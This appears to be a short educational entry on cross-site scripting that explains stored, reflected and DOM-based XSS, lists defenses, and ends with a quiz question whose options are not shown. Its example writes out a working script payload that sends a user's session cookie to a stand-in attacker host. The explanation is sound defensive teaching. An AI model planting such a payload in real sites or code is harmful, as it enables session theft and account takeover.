XSS injection (Cross-site scripting)
What is it?
XSS injection (Cross-site scripting) is a web security vulnerability where an attacker injects malicious client-side scripts (usually JavaScript) into a web page that other users' browsers will execute. It exploits unsafe handling of user input or insufficient output encoding/sanitization. Consequences include session theft, account takeover, content manipulation, and distribution of malware.
Practical example
Imagine a discussion board that renders user comments without sanitizing HTML. An attacker posts a comment containing <script>fetch('https://attacker.example/steal?c='+document.cookie)</script>. When other users view that thread, the script executes in their browsers and sends their session cookie to the attacker. This illustrates stored XSS; other types include reflected XSS (payload reflected via a URL or parameter) and DOM-based XSS (vulnerabilities in client-side script manipulation). Developers mitigate XSS using context-aware output encoding, robust sanitizers such as DOMPurify, Content Security Policy, and secure cookie settings (HttpOnly, SameSite).
Test your knowledge
Which of the following is the most effective primary defense against stored XSS when rendering user-generated content on a page?